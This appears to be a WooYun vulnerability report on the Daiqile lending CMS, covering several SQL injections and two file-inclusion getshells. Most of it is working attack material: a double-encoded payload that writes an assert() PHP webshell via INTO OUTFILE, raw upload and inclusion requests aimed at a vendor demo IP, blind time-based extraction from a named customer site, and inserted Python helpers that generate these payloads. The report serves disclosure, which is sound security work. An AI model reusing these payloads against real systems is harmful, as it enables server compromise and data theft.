
Vulnerability summary

Defect ID: wooyun-2015-0136418

Title: 贷齐乐 (Daiqile): five injection points and two getshells

Vendor: chinaanhe.com

Author: ′雨。

Submitted: 2015-08-24 09:57

Fixed: 2015-11-22 14:38

Published: 2015-11-22 14:38

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor confirmed

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-08-24: Details sent to the vendor, awaiting vendor handling
2015-08-24: Vendor confirmed; details visible to the vendor only
2015-08-27: Details opened to third-party security partners
2015-10-18: Details opened to core white hats and domain experts
2015-10-28: Details opened to regular white hats
2015-11-07: Details opened to intern white hats
2015-11-22: Details made public

Brief description:

Some of these need no login.
Tested against the showcase customer you are so proud of.

Detailed description:

A global filter and addslashes() have been added. Pretty slick, but then what?
Tested against 宁波贷 (www.nbdai0574.com), the customer you are so proud of.
0x01 Injection 1
In index.php:

elseif ($_G['query_site'] == "integral" || strstr($_G['query_site'],'integral')){
include_once ("modules/integral/integral_mall.php");
//$magic->display("integral.html");
exit;
}


Now look at the code in that file, modules/integral/integral_mall.php:

elseif ($_U['query_class'] == 'check_email'){
    // second decode: PHP has already decoded the body once and the global
    // addslashes filter has already run, so %2527 arrives here as a bare '
    $email = urldecode($_REQUEST['email']);
    $sql = "select * from {user} where email='{$email}'"; // interpolated, unescaped
    $result = $mysql->db_fetch_array($sql);

    if ($result == false){
        echo true;exit;
    }else{
        echo false;exit;
    }
}


A neat urldecode() right before the value goes into the query. I like it.
On www.nbdai0574.com:
POST: query_site=integral&q=action/check_email&email=%2527
Response: 提示:MySQL错误信息:参数非法! ("MySQL error: illegal parameter!"). PHP turns %2527 into %27 while parsing the body; the global addslashes() sees no quote and leaves it alone; the application's own urldecode() then produces a bare ' inside the query.
How to inject? POST the following packet and it writes a shell directly:
query_site=integral&q=action/check_email&email=%25%32%37%25%32%30%25%36%31%25%36%45%25%36%34%25%32%30%25%33%30%25%32%30%25%35%35%25%34%45%25%34%39%25%34%46%25%34%45%25%32%30%25%35%33%25%34%35%25%34%43%25%34%35%25%34%33%25%35%34%25%32%30%25%33%30%25%37%38%25%33%33%25%34%33%25%33%33%25%34%36%25%33%37%25%33%30%25%33%36%25%33%38%25%33%37%25%33%30%25%33%32%25%33%30%25%33%36%25%33%31%25%33%37%25%33%32%25%33%37%25%33%32%25%33%36%25%33%31%25%33%37%25%33%39%25%33%35%25%34%36%25%33%36%25%34%34%25%33%36%25%33%31%25%33%37%25%33%30%25%33%32%25%33%38%25%33%32%25%33%32%25%33%36%25%33%31%25%33%37%25%33%33%25%33%37%25%33%33%25%33%36%25%33%35%25%33%37%25%33%32%25%33%37%25%33%34%25%33%32%25%33%32%25%33%32%25%34%33%25%33%32%25%33%38%25%33%36%25%33%31%25%33%37%25%33%32%25%33%37%25%33%32%25%33%36%25%33%31%25%33%37%25%33%39%25%33%32%25%33%39%25%33%32%25%33%34%25%33%35%25%34%36%25%33%35%25%33%32%25%33%34%25%33%35%25%33%35%25%33%31%25%33%35%25%33%35%25%33%34%25%33%35%25%33%35%25%33%33%25%33%35%25%33%34%25%33%35%25%34%32%25%33%32%25%33%37%25%33%37%25%33%39%25%33%37%25%33%35%25%33%32%25%33%37%25%33%35%25%34%34%25%33%32%25%33%39%25%33%33%25%34%32%25%33%33%25%34%36%25%33%33%25%34%35%25%32%43%25%33%32%25%32%43%25%33%33%25%32%43%25%33%34%25%32%43%25%33%35%25%32%43%25%33%36%25%32%43%25%33%37%25%32%43%25%33%38%25%32%43%25%33%39%25%32%43%25%33%31%25%33%30%25%32%43%25%33%31%25%33%31%25%32%43%25%33%31%25%33%32%25%32%43%25%33%31%25%33%33%25%32%43%25%33%31%25%33%34%25%32%43%25%33%31%25%33%35%25%32%43%25%33%31%25%33%36%25%32%43%25%33%31%25%33%37%25%32%43%25%33%31%25%33%38%25%32%43%25%33%31%25%33%39%25%32%43%25%33%32%25%33%30%25%32%43%25%33%32%25%33%31%25%32%43%25%33%32%25%33%32%25%32%43%25%33%32%25%33%33%25%32%43%25%33%32%25%33%34%25%32%43%25%33%32%25%33%35%25%32%43%25%33%32%25%33%36%25%32%43%25%33%32%25%33%37%25%32%43%25%33%32%25%33%38%25%32%43%25%33%32%25%33%39%25%32%43%25%33%33%25%33%30%25%32%43%25%33%33%25%33%31%25%32%43%25%33%33%25%33%32%25%32%43%25%33%33%25%33%33%25%32%43%25%33%33%25%33%34%25%32%43
%25%33%33%25%33%35%25%32%43%25%33%33%25%33%36%25%32%43%25%33%33%25%33%37%25%32%43%25%33%33%25%33%38%25%32%43%25%33%33%25%33%39%25%32%43%25%33%34%25%33%30%25%32%43%25%33%34%25%33%31%25%32%43%25%33%34%25%33%32%25%32%43%25%33%34%25%33%33%25%32%43%25%33%34%25%33%34%25%32%43%25%33%34%25%33%35%25%32%43%25%33%34%25%33%36%25%32%43%25%33%34%25%33%37%25%32%43%25%33%34%25%33%38%25%32%43%25%33%34%25%33%39%25%32%43%25%33%35%25%33%30%25%32%43%25%33%35%25%33%31%25%32%43%25%33%35%25%33%32%25%32%43%25%33%35%25%33%33%25%32%30%25%36%39%25%36%45%25%37%34%25%36%46%25%32%30%25%36%46%25%37%35%25%37%34%25%36%36%25%36%39%25%36%43%25%36%35%25%32%30%25%32%37%25%32%46%25%37%35%25%37%33%25%37%32%25%32%46%25%37%33%25%36%38%25%36%31%25%37%32%25%36%35%25%32%46%25%36%45%25%36%37%25%36%39%25%36%45%25%37%38%25%32%46%25%36%38%25%37%34%25%36%44%25%36%43%25%32%46%25%37%39%25%37%35%25%33%31%25%32%45%25%37%30%25%36%38%25%37%30%25%32%37%25%32%33
Decoded twice, the email value is ' and 0 UNION SELECT 0x3C3F7068702061727261795F6D61702822617373657274222C28617272617929245F524551554553545B277975275D293B3F3E,2,3,...,53 into outfile '/usr/share/nginx/html/yu1.php'#, where the hex literal is <?php array_map("assert",(array)$_REQUEST['yu']);?>. It wrote yu1.php directly.
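To make the bypass concrete, here is an added example (not code from the report or from Daiqile) that models the three stages the email parameter passes through in check_email: PHP's one-time decoding of the body, a global addslashes() filter, and the application's second urldecode(). It also rebuilds the decoded PoC payload from the shell text and OUTFILE path decoded above; the table name `user` (the page's `{user}` placeholder), the column count of 53 and the fully percent-encoded form are taken from the PoC, and everything else is illustrative.

```python
# Added example (not code from the report or from Daiqile): a model of the
# three decoding/escaping stages check_email passes the email parameter
# through, showing why %2527 defeats a global addslashes() filter.
from urllib.parse import unquote


def php_request_decode(raw: str) -> str:
    """PHP percent-decodes the request body once while filling $_REQUEST."""
    return unquote(raw)


def addslashes(s: str) -> str:
    """PHP addslashes(): backslash-escape ', ", \\ and NUL (the global filter)."""
    out = []
    for ch in s:
        if ch in ("'", '"', "\\"):
            out.append("\\" + ch)
        elif ch == "\x00":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def email_sql(raw_param: str) -> str:
    """The query integral_mall.php builds, after all three stages:
    PHP decode -> global addslashes -> application urldecode -> interpolation.
    Table name `user` stands in for the page's {user} placeholder."""
    email = unquote(addslashes(php_request_decode(raw_param)))
    return f"select * from user where email='{email}'"


def full_encode(s: str) -> str:
    """Percent-encode every byte (the PoC encodes letters and digits too)."""
    return "".join("%%%02X" % b for b in s.encode("utf-8"))


def union_outfile_payload(columns: int = 53,
                          target: str = "/usr/share/nginx/html/yu1.php") -> str:
    """Rebuild the decoded PoC payload: a UNION SELECT whose first column is a
    hex-literal PHP shell, padded to the table's column count and written to
    the web root with INTO OUTFILE.  Shell text and path are the decoded PoC."""
    shell = "<?php array_map(\"assert\",(array)$_REQUEST['yu']);?>"
    hexlit = "0x" + shell.encode().hex().upper()
    padding = ",".join(str(i) for i in range(2, columns + 1))
    return f"' and 0 UNION SELECT {hexlit},{padding} into outfile '{target}'#"


def demo() -> dict:
    """A single-encoded quote is neutralised; a double-encoded one survives,
    and so does the whole double-encoded OUTFILE payload."""
    return {
        "single": email_sql("%27"),
        "double": email_sql("%2527"),
        "shell": email_sql(full_encode(full_encode(union_outfile_payload()))),
    }


if __name__ == "__main__":
    for label, sql in demo().items():
        print(f"{label}: {sql[:120]}")
```

The fix the model points at is structural: never decode user input after the escaping layer has run, and bind the value as a parameter instead of interpolating it, so the quoting stage is the last thing that touches it.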
0x02 Injection 2
Still in integral_mall.php:

}else{
//gift redemption list
$data_list['page'] = $_REQUEST['page'];
$data_list['epage'] = 20;
$data_list['name'] = isset($_REQUEST['name'])?$_REQUEST['name']:"";
$data_list['price'] = empty($_REQUEST['price'])?'':$_REQUEST['price'];
$data_list['type'] = empty($_REQUEST['type'])?'':$_REQUEST['type'];
$data_list['order'] = empty($_REQUEST['order'])?'':$_REQUEST['order'];
$data_list['k'] = empty($_REQUEST['k'])?'':urldecode($_REQUEST['k']);//second decode of the search keyword, after the global filter has run
$_A['product_k'] = $data_list['k'];
if(empty($data_list['order'])){
$_A['default_order'] = 1;
$_A['inte_order'] = 1;
$_A['time_order'] = 1;
$_A['order_type'] = 'default';
}else{
$_order_arr = explode(',',$data_list['order']);
switch($_order_arr[0]){
case 'default':
if($_order_arr[1]==1){
$_A['default_order'] = 0;
}else{
$_A['default_order'] = 1;
}
$_A['inte_order'] = 0;
$_A['time_order'] = 0;
$_A['order_type'] = 'default';
break;
case 'time':
if($_order_arr[1]==1){
$_A['time_order'] = 0;
}else{
$_A['time_order'] = 1;
}
$_A['default_order'] = 0;
$_A['inte_order'] = 0;
$_A['order_type'] = 'time';
break;
case 'inte':
if($_order_arr[1]==1){
$_A['inte_order'] = 0;
}else{
$_A['inte_order'] = 1;
}
$_A['default_order'] = 0;
$_A['time_order'] = 0;
$_A['order_type'] = 'inte';
break;
}
$_A['product_order'] = $data_list['order'];
}
if(!empty($_REQUEST['price'])){
$_A['product_price'] = $_REQUEST['price'];
}
if(!empty($_REQUEST['type'])){
$_A['product_type'] = $_REQUEST['type'];
}
$result = integralClass::GetList($data_list);


This else branch is taken when no product is specified.
Another lovely urldecode() on user input. I like it.
On www.nbdai0574.com:
POST: query_site=integral&q=action/xxx&k=%2527
Injection method as in 0x01.
0x03 Getshell 1
In modules/member/index_default:

//user-centre base URL
$member_url = "index.php?".$_G['query_site'];
$_U['member_url'] = $member_url;
//module, paging, items per page
$_U['page'] = empty($_REQUEST['page'])?"1":$_REQUEST['page'];//page number
$_U['epage'] = empty($_REQUEST['epage'])?"10":$_REQUEST['epage'];//items per page
//classify the query string
$q = empty($_REQUEST['q'])?"":urldecode($_REQUEST['q']);//fetch and decode: a second decode after PHP's own, so the global filter is bypassed
$_q = explode("/",$q);
$_U['query'] = $q;
$_U['query_sort'] = empty($_q[0])?"main":$_q[0];
$_U['query_class'] = empty($_q[1])?"list":$_q[1];//note this: attacker-controlled, used in an include() below
$_U['query_type'] = empty($_q[2])?"list":$_q[2];
$_U['query_url'] = $_U['member_url']."&q={$_U['query_sort']}/{$_U['query_class']}";
$_U['user_reg_key'] = "asdfaswerwer";


Further down:

}elseif ($_U['query_sort'] == "code"){
    if (!isset($_G['user_id']) || $_G['user_id']==""){
        header('location:index.php?user&q=action/login');
        // no exit after header(): execution falls through to the include below
    }

    if (is_file(ROOT_PATH."/modules/{$_U['query_class']}/{$_U['query_class']}.inc.php")){
        include(ROOT_PATH."/modules/{$_U['query_class']}/{$_U['query_class']}.inc.php");
    }else{
        $msg = array("您操作有误,请勿乱操作"); // "Invalid operation, please do not tamper"
    }


So it includes whatever query_class names. But above, $_q = explode("/",$q) splits q on "/", so the only way to step up a directory is ..\, which I think only Windows honours. Because the value is urldecoded after the filter, GPC escaping is irrelevant; the NUL-byte truncation at the end of the path depends on the PHP version (PHP 5.3.4 started rejecting paths containing NUL).
So we need a Windows Daiqile install; the vendor's own demo will do:
121.40.166.230:10025
First find somewhere that accepts image uploads and upload a "jpg" containing phpinfo():

POST /plugins/editor/sinaeditor/editor/upload.php?action=upload HTTP/1.1
Host: 121.40.166.230:10025
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Cookie: uchome_auth=3838UNlcYHqf9iB3IPbJz1s5PGZ0svPTcikiYKRylegS37m7en4wgaGw0QY%2BUoNGpacjkaJAzePH8ClrW4EJ;
Content-Type: multipart/form-data; boundary=---------------------------2995119424827
Content-Length: 202
-----------------------------2995119424827
Content-Disposition: form-data; name="file1"; filename="a.jpg"
Content-Type: image/jpeg
<?php phpinfo();?>
-----------------------------2995119424827--


Response: <script>window.parent.LoadIMG('../../../data/upfiles/201508231440326040.jpg');</script>
http://121.40.166.230:10025/data/upfiles/201508231440326040.jpg
Now include that file.
First log in as a member at http://121.40.166.230:10025/?user (xiaoyu / xiaoyu).
Then include it. Input is globally escaped, but double encoding gets around that, since the value is urldecoded again after the filter:
http://121.40.166.230:10025/?user
POST:q=code/%25%32%45%25%32%45%25%35%43%25%36%34%25%36%31%25%37%34%25%36%31%25%35%43%25%37%35%25%37%30%25%36%36%25%36%39%25%36%43%25%36%35%25%37%33%25%35%43%25%33%32%25%33%30%25%33%31%25%33%35%25%33%30%25%33%38%25%33%32%25%33%33%25%33%31%25%33%34%25%33%34%25%33%30%25%33%33%25%33%32%25%33%36%25%33%30%25%33%34%25%33%30%25%32%45%25%36%41%25%37%30%25%36%37%25%30%30

(Decoded twice, q is code/..\data\upfiles\201508231440326040.jpg followed by a NUL byte, so the include path becomes modules/..\data\upfiles\201508231440326040.jpg and the NUL cuts off the trailing /...inc.php.)

[Screenshot: 1 (2).jpg]

The uploaded jpg executed successfully.
0x04 Getshell 2
In modules\integral\integral_mall.php:

//module, paging, items per page
$_U['page'] = empty($_REQUEST['page'])?"1":$_REQUEST['page'];//page number
$_U['epage'] = empty($_REQUEST['epage'])?"10":$_REQUEST['epage'];//items per page
//classify the query string
$q = empty($_REQUEST['q'])?"":urldecode($_REQUEST['q']);//fetch and decode a second time
$_q = explode("/",$q);
$_U['query'] = $q;
$_U['query_sort'] = empty($_q[0])?"main":$_q[0];
$_U['query_class'] = empty($_q[1])?"list":$_q[1];
$_U['query_type'] = empty($_q[2])?"list":$_q[2];
$_U['query_url'] = $_U['member_url']."&q={$_U['query_sort']}/{$_U['query_class']}";


Further down:

}elseif ($_U['query_sort'] == "code"){
    if (!isset($_G['user_id']) || $_G['user_id']==""){
        //WeChat login
        if(strstr($_SERVER['REQUEST_URI'],'/wx/') || !empty($_REQUEST['wx'])){
            header('location:index.php?user&q=action/login&wx=1');
        }else{
            header('location:index.php?user&q=action/login');
        }
        // again no exit after header(): the include below still runs
    }

    if (is_file(ROOT_PATH."/modules/{$_U['query_class']}/{$_U['query_class']}.inc.php")){
        include(ROOT_PATH."/modules/{$_U['query_class']}/{$_U['query_class']}.inc.php");
    }else{
        $msg = array("您操作有误,请勿乱操作"); // "Invalid operation, please do not tamper"
    }


Same as the previous one; it is reached the way the injection above is (query_site=integral). Nothing more to say about it.
0x05 Injection 3
In /plugins/jquery.uploadify/uploadify.php:

$save_path1 = "../../";
$save_path2 = "data/upfiles/userimg/";
$targetFolder = $save_path1 . $save_path2; // Relative to the root
//create the folder if it does not exist
createFolder($targetFolder);
$verifyToken = md5('unique_salt' . $_POST['timestamp']);//token check: we simply do not post timestamp, so the token is the constant md5('unique_salt')
if (!empty($_FILES) && $_POST['token'] == $verifyToken) {
    $tempFile = $_FILES['Filedata']['tmp_name'];
    $targetPath = $_SERVER['DOCUMENT_ROOT'] . $targetFolder;
    $file_name = $_FILES['Filedata']['name'];
    $file_name = "pic".mktime().rand(0,999). rechinese($file_name);//the client-supplied name is kept (only Chinese characters stripped)

    $targetFile = $targetFolder . $file_name;

    // Validate the file type
    $fileTypes = array('jpg','jpeg','gif','png'); // File extensions

    $fileParts = pathinfo($file_name);

    if (in_array($fileParts['extension'],$fileTypes)) {//only the extension is checked
        if(move_uploaded_file($tempFile,$targetFile)){
            $data["img"]=$save_path2.$file_name;
            $data["auctionid"]=0;
            if(isset($_POST["reloadid"])&&$_POST["reloadid"]!=="0"){
                $sql = "update `{attestation}` set `addtime` = '" . time () . "',`addip` = '" . ip_address () . "'";
                foreach ( $data as $key => $value ) {
                    $sql .= ",`$key` = '$value'";
                }
                $sql.=" where id={$_POST["reloadid"]}";
            }else{
                $sql = "insert into `{attestation}` set `addtime` = '" . time () . "',`addip` = '" . ip_address () . "'";
                foreach ( $data as $key => $value ) {
                    $sql .= ",`$key` = '$value'";
                }//the foreach concatenates the file name straight into the SQL
            }

            $result=$mysql->db_query ( $sql );
            if ($result) {
                //return the inserted id
                if(isset($_POST["reloadid"])&&$_POST["reloadid"]!=="0" ){
                    echo json_encode(array("id"=>$_POST["reloadid"],"filename"=>$file_name));
                }else{
                    echo json_encode(array("id"=>$mysql->db_insert_id(),"filename"=>$file_name));

                }
            } else {


The extension is whitelisted at upload time, but the foreach loop then concatenates the original file name into the SQL, so the upload file name is injected.
The global filter does not touch $_FILES, so it is bypassed entirely.
Tested on your own www.nbdai0574.com:

POST /plugins/jquery.uploadify/uploadify.php HTTP/1.1
Host: www.nbdai0574.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Cookie: uchome_auth=3838UNlcYHqf9iB3IPbJz1s5PGZ0svPTcikiYKRylegS37m7en4wgaGw0QY%2BUoNGpacjkaJAzePH8ClrW4EJ;
Content-Type: multipart/form-data; boundary=---------------------------29862134505396
Content-Length: 318
-----------------------------29862134505396
Content-Disposition: form-data; name="token"
6b79a77180e9ec3a7ca351ebe54641a2
-----------------------------29862134505396
Content-Disposition: form-data; name="Filedata"; filename="a'.jpg"
Content-Type: image/jpeg
a
-----------------------------29862134505396--


HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Sun, 23 Aug 2015 03:56:41 GMT
Content-Type: text/html;charset=GB2312
Connection: keep-alive
Set-Cookie: PHPSESSID=is7r2ov3530pdou3r7fkbj4g90; path=/
Content-Length: 24
MySQL错误信息:参数非法! (GB2312; "MySQL error: illegal parameter!")



The "illegal parameter" MySQL error is the error marker: the single quote reached the query. From here, blind injection:

POST /plugins/swfupload/upload.array.php HTTP/1.1
Host: www.nbdai0574.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Cookie: uchome_auth=3838UNlcYHqf9iB3IPbJz1s5PGZ0svPTcikiYKRylegS37m7en4wgaGw0QY%2BUoNGpacjkaJAzePH8ClrW4EJ;
Content-Type: multipart/form-data; boundary=---------------------------10383149458909
Content-Length: 376
-----------------------------10383149458909
Content-Disposition: form-data; name="token"
6b79a77180e9ec3a7ca351ebe54641a2
-----------------------------10383149458909
Content-Disposition: form-data; name="Filedata"; filename="1' or if(ascii(substr((select user()),1,1))=114,sleep(2),1)#.jpg"
Content-Type: image/jpeg
1
-----------------------------10383149458909--


When the ASCII code of the first character of user() is 114 the response is delayed; on 宁波贷 it delayed for 114,
so the first character of user() is "r".
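As an added example (not code from the report or from Daiqile), the following models the uploadify.php path shown above in Python: the constant token when no timestamp is posted, the pathinfo() extension check the file name passes, the INSERT ... SET statement the foreach loop concatenates, and a builder for the time-based file names used in the blind step. The mktime()/rand() prefix is fixed for the demo, rechinese() is modelled as CJK removal because its source is not on the page, and the table name `attestation` stands in for the `{attestation}` placeholder.

```python
# Added example (not code from the report or from Daiqile): a model of
# uploadify.php's upload handling, showing that a file name passes the
# extension whitelist yet lands unescaped in the INSERT, plus a builder for
# the time-based blind file names and the multipart body that carries them.
import hashlib
import re

IMAGE_EXTS = ("jpg", "jpeg", "gif", "png")


def fixed_token() -> str:
    """md5('unique_salt' . $_POST['timestamp']) with no timestamp posted: the
    undefined index concatenates as '', so the token is a constant."""
    return hashlib.md5(b"unique_salt").hexdigest()


def rechinese(name: str) -> str:
    """The report says rechinese() only strips Chinese characters; modelled as
    CJK removal (assumption: the helper's source is not on the page)."""
    return re.sub(r"[\u4e00-\u9fff]+", "", name)


def pathinfo_extension(name: str) -> str:
    """PHP pathinfo($name)['extension']: text after the last dot of the basename."""
    base = name.rsplit("/", 1)[-1]
    return base.rsplit(".", 1)[1] if "." in base else ""


def extension_allowed(stored: str) -> bool:
    """in_array($fileParts['extension'], $fileTypes), case-sensitive."""
    return pathinfo_extension(stored) in IMAGE_EXTS


def stored_name(upload_name: str, prefix: str = "pic1440302201123") -> str:
    """"pic".mktime().rand(0,999).rechinese($file_name); prefix fixed for the demo."""
    return prefix + rechinese(upload_name)


def attestation_insert(upload_name: str, addtime: int, addip: str) -> str:
    """The INSERT ... SET statement uploadify.php builds by concatenation."""
    name = stored_name(upload_name)
    data = {"img": "data/upfiles/userimg/" + name, "auctionid": 0}
    sql = f"insert into `attestation` set `addtime` = '{addtime}',`addip` = '{addip}'"
    for key, value in data.items():
        sql += f",`{key}` = '{value}'"
    return sql


def quotes_balanced(sql: str) -> bool:
    """An odd number of single quotes means the file name broke out of its literal."""
    return sql.count("'") % 2 == 0


def blind_filename(position: int, ascii_code: int, delay: int = 2) -> str:
    """The PoC's time-based oracle: keeps a .jpg extension, closes the img
    literal, and delays the INSERT when user()[position] has the given code."""
    return (f"1' or if(ascii(substr((select user()),{position},1))={ascii_code},"
            f"sleep({delay}),1)#.jpg")


def multipart_body(boundary: str, token: str, filename: str, content: bytes = b"1") -> bytes:
    """multipart/form-data body with the token field and the Filedata part,
    as an upload client would send it (file name is not escaped)."""
    b = b"--" + boundary.encode()
    parts = [
        b, b'Content-Disposition: form-data; name="token"', b"", token.encode(),
        b, b'Content-Disposition: form-data; name="Filedata"; filename="' + filename.encode() + b'"',
        b"Content-Type: image/jpeg", b"", content,
        b + b"--", b"",
    ]
    return b"\r\n".join(parts)


if __name__ == "__main__":
    fn = blind_filename(1, 114)
    print(extension_allowed(stored_name(fn)), attestation_insert(fn, 1440302201, "198.51.100.7"))
```

A driver would send multipart_body() once per (position, ASCII code) pair and time the response; the extension check never interferes because pathinfo() only looks past the last dot. The server-side fix is the same as for 0x01: bind `img` as a parameter rather than interpolating the file name.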
0x06 Injection 4
In plugins/swfupload/upload.array.php:

$valid_chars_regex = '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format); defined but never applied to $file_name in this excerpt
$save_path1 = "../../";
$save_path2 = "data/upfiles/litpics/";
$save_path = $save_path1 . $save_path2;
$file_name = $_FILES ["Filedata"] ["name"];
// Validate that we won't over-write an existing file
if (file_exists ( $save_path . $file_name )) {
    //HandleError ( "File with this name already exists" );
    exit ( 0 );
}
$file_name = "pic" . mktime ().rand(0,999) . rechinese ( $file_name );//only strips Chinese characters; does not affect the payload
// Validate file extension
$path_info = pathinfo ( $file_name );
$file_extension = $path_info ["extension"];//take the extension
$is_valid_extension = false;
foreach ( $extension_whitelist as $extension ) {//extension whitelist check
    if (strcasecmp ( $file_extension, $extension ) == 0) {
        $is_valid_extension = true;
        break;
    }
}
if (! $is_valid_extension) {
    //HandleError ( "Invalid file extension" );
    exit ( 0 );
}
if (! @move_uploaded_file ( $_FILES ["Filedata"] ["tmp_name"], $save_path . $file_name )) {
    echo "faild!";
    exit ( 0 );
} else {

    // look up user_id directly by username; not yet clear how (original comment)
    //$sql1 = "select user_id from {user} where username='" . $_SESSION ['username'] . "'";
    //$res1 = $mysql->db_fetch_array ( $sql1 );
    //print_r ( $res1 );
    // userid
    $data ['user_id'] = $userid;

    $_G ['upimg'] ['file'] = "pics";
    $_G ['upimg'] ['cut_status'] = 0;
    $_G ['upimg'] ['code'] = "attestation";
    $data ['type_id'] = 1;
    $data ['name'] = $file_name;

    $data ['litpic'] = $save_path2 . $file_name;

    $sql = "insert into `{attestation}` set `addtime` = '" . time () . "',`addip` = '" . ip_address () . "'";
    foreach ( $data as $key => $value ) {
        $sql .= ",`$key` = '$value'";//file name concatenated unescaped, via both `name` and `litpic`
    }
    $result = $mysql->db_query ( $sql );

    if ($result !== true) {
        echo "failed";
    } else {
        echo "success";
    }


With a valid image extension the file name goes straight into the SQL; because it comes from $_FILES it bypasses all of the global filtering.

POST /plugins/swfupload/upload.array.php HTTP/1.1
Host: www.nbdai0574.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Cookie: uchome_auth=3838UNlcYHqf9iB3IPbJz1s5PGZ0svPTcikiYKRylegS37m7en4wgaGw0QY%2BUoNGpacjkaJAzePH8ClrW4EJ;
Content-Type: multipart/form-data; boundary=---------------------------29862134505396
Content-Length: 318
-----------------------------29862134505396
Content-Disposition: form-data; name="token"
6b79a77180e9ec3a7ca351ebe54641a2
-----------------------------29862134505396
Content-Disposition: form-data; name="Filedata"; filename="a'.jpg"
Content-Type: image/jpeg
a
-----------------------------29862134505396--


The response is 提示:MySQL错误信息:参数非法! ("MySQL error: illegal parameter!"),
so the single quote went in. Injection method as in 0x05; no need to repeat it.
0x07 A pile of injections from one shared helper

function ip_address() {
    if(!empty($_SERVER["HTTP_CLIENT_IP"])) {
        $ip_address = $_SERVER["HTTP_CLIENT_IP"]; // Client-IP header taken verbatim
    }else if(!empty($_SERVER["HTTP_X_FORWARDED_FOR"])){
        $ip_address = array_pop(explode(',', $_SERVER['HTTP_X_FORWARDED_FOR'])); // only the last comma-separated element survives
    }else if(!empty($_SERVER["REMOTE_ADDR"])){
        $ip_address = $_SERVER["REMOTE_ADDR"];
    }else{
        $ip_address = '';
    }
    return $ip_address; // returned unvalidated; callers interpolate it into SQL
}


The ancient X-Forwarded-For bug. Commas in XFF are used as a separator and only the last element is kept, so use Client-IP instead.
This shared helper causes a pile of injections.
A few examples, picked at random:

POST /plugins/swfupload/upload.array.php HTTP/1.1
Host: www.nbdai0574.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
x-forwarded-for:
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Cookie: uchome_auth=3838UNlcYHqf9iB3IPbJz1s5PGZ0svPTcikiYKRylegS37m7en4wgaGw0QY%2BUoNGpacjkaJAzePH8ClrW4EJ;
Content-Type: multipart/form-data; boundary=---------------------------10383149458909
Content-Length: 339
-----------------------------10383149458909
Content-Disposition: form-data; name="token"
6b79a77180e9ec3a7ca351ebe54641a2
-----------------------------10383149458909
Content-Disposition: form-data; name="Filedata"; filename="8_3M[__GP4JQURNQG0JXX0S.jpg"
Content-Type: image/jpeg
1
-----------------------------10383149458909--


Returns success.
Change the x-forwarded-for header to 1' select from and it errors out.

[Screenshot: 1 (3).jpg]


Enough said; this XFF/Client-IP issue is in many places.
Injection method also as in 0x05.
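To pin down the difference between the two headers, here is an added example (not code from the report or from Daiqile) that mirrors the shared ip_address() helper in Python, shows the `addip` = '...' fragment every caller appends to its SQL, and puts a hardened replacement beside it. The hardened version is this editor's suggestion, not the vendor's fix: it ignores Client-IP, honours X-Forwarded-For only when the socket peer is a configured trusted proxy, and requires the result to parse as an IP literal so it can never carry SQL syntax. The sample header values are constructed.

```python
# Added example (not code from the report or from Daiqile): the shared
# ip_address() helper modelled in Python next to a hardened replacement,
# showing why a comma-bearing X-Forwarded-For payload is cut short while
# Client-IP arrives intact, and what a safe version looks like.
import ipaddress


def ip_address(server: dict) -> str:
    """Mirror of the PHP helper: Client-IP verbatim, else the LAST element of
    X-Forwarded-For (array_pop(explode(','))), else REMOTE_ADDR."""
    if server.get("HTTP_CLIENT_IP"):
        return server["HTTP_CLIENT_IP"]
    if server.get("HTTP_X_FORWARDED_FOR"):
        return server["HTTP_X_FORWARDED_FOR"].split(",")[-1]
    return server.get("REMOTE_ADDR", "")


def addip_fragment(server: dict) -> str:
    """The `addip` = '...' piece every caller appends to its INSERT/UPDATE."""
    return f"`addip` = '{ip_address(server)}'"


def _is_ip(value: str) -> bool:
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def ip_address_hardened(server: dict, trusted_proxies: frozenset = frozenset()) -> str:
    """Trust the socket peer; use X-Forwarded-For only when the peer is a known
    proxy, take the element that proxy appended, and require a valid IP
    literal.  Client-IP is never consulted.  Returns '' if nothing validates."""
    peer = server.get("REMOTE_ADDR", "")
    candidate = peer
    if peer in trusted_proxies and server.get("HTTP_X_FORWARDED_FOR"):
        candidate = server["HTTP_X_FORWARDED_FOR"].split(",")[-1].strip()
    if _is_ip(candidate):
        return str(ipaddress.ip_address(candidate))
    return peer if _is_ip(peer) else ""


if __name__ == "__main__":
    # Constructed header sets; 198.51.100.0/24 and 203.0.113.0/24 are documentation ranges.
    via_xff = {"HTTP_X_FORWARDED_FOR": "1' or sleep(2)#,203.0.113.9", "REMOTE_ADDR": "198.51.100.7"}
    via_cip = {"HTTP_CLIENT_IP": "1' select from", "REMOTE_ADDR": "198.51.100.7"}
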